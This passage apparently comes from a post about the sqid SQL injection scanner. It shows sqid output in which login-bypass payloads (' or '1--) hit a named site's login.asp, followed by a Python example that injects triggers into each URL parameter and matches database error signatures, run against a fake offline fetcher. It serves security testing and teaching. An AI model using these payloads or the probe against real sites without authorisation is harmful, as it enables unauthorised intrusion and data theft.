500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1--

500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1--

500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201--%20

500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201--%20

----snip
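To make the mechanics concrete, here is an added example of my own (not sqid's code) that does the two things sqid does for every URL: it injects the trigger into each query parameter in turn (so `?CID=72&DID=3079` yields one test URL with `CID='` and another with `DID='`, as in the Google run above), then classifies the response against a table of error signatures and reports them the way sqid prints them. The signature regexes are an illustrative stand-in for sqid.db, not copied from it, and the HTTP fetch is a constructed fake so the whole thing runs offline; swap in a real fetcher (urllib through your proxy) to use it against a target you are authorised to test.

```python
"""Per-parameter trigger injection plus error-signature classification, the
core of what sqid does for each URL.

Added example, not sqid's code.  SIGNATURES is an illustrative stand-in for
sqid.db, and fake_fetch is a constructed response generator; neither is from
the original post."""
import re
from urllib.parse import urlsplit, urlunsplit, quote

# Constructed signature table: (label as sqid prints it, regex over the response body).
SIGNATURES = [
    ("MS-SQL Server error", re.compile(
        r"Microsoft OLE DB Provider for SQL Server|\[SQL Server\]|Unclosed quotation mark", re.I)),
    ("MS-Access error", re.compile(r"Microsoft JET Database Engine|ODBC Microsoft Access", re.I)),
    ("VBScript runtime error", re.compile(r"Microsoft VBScript runtime", re.I)),
    ("ADODB Error", re.compile(r"ADODB\.\w+ error", re.I)),
]


def load_triggers(text):
    """Trigger-file rules from the help: one trigger per line, # lines ignored."""
    return [ln for ln in text.splitlines() if ln.strip() and not ln.startswith('#')]


def inject(url, trigger):
    """One test URL per query parameter, that parameter's value replaced by the trigger.

    The query is split without decoding so untouched values stay byte-for-byte as
    given; the trigger is percent-encoded except for the quote, matching sqid's
    display (' or '1-- becomes '%20or%20'1--).  A URL with no query yields nothing."""
    parts = urlsplit(url)
    pairs = [p.split('=', 1) if '=' in p else [p, ''] for p in parts.query.split('&') if p]
    enc = quote(trigger, safe="'")
    out = []
    for i in range(len(pairs)):
        q = '&'.join(k + '=' + (enc if j == i else v) for j, (k, v) in enumerate(pairs))
        out.append(urlunsplit((parts.scheme, parts.netloc, parts.path, q, '')))
    return out


def classify(status, body):
    """sqid-style verdict: status plus first matching signature, '<status> No match'
    for a server error with no recognised text, None for anything else."""
    for label, rx in SIGNATURES:
        if rx.search(body):
            return "%d %s" % (status, label)
    return "%d No match" % status if status >= 500 else None


def check(url, triggers, fetch):
    """fetch(url) -> (status, body).  Returns (verdict, tested_url) pairs."""
    findings = []
    for trig in triggers:
        for test_url in inject(url, trig):
            status, body = fetch(test_url)
            verdict = classify(status, body)
            if verdict:
                findings.append((verdict, test_url))
    return findings


def fake_fetch(url):
    """Constructed stand-in for HTTP: any quote in the query 'breaks' the SQL."""
    if "'" in urlsplit(url).query:
        return 500, ("Microsoft OLE DB Provider for SQL Server error '80040e14' "
                     "Unclosed quotation mark before the character string ''.")
    return 200, "<html>ok</html>"


if __name__ == '__main__':
    trig = load_triggers("'\n' or '1\n# ignored\n' or '1--\n")
    for verdict, u in check("http://www.site.info/page.asp?page=", trig, fake_fetch):
        print(verdict, "=>", u)
```

Each verdict line mirrors sqid's output (`500 MS-SQL Server error => http://www.site.info/page.asp?page='`). Note that a missing error page does not mean the parameter is safe: a site that swallows errors into a generic 200 needs boolean or time-based probes that this error-matching approach, like sqid's, does not attempt.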

CG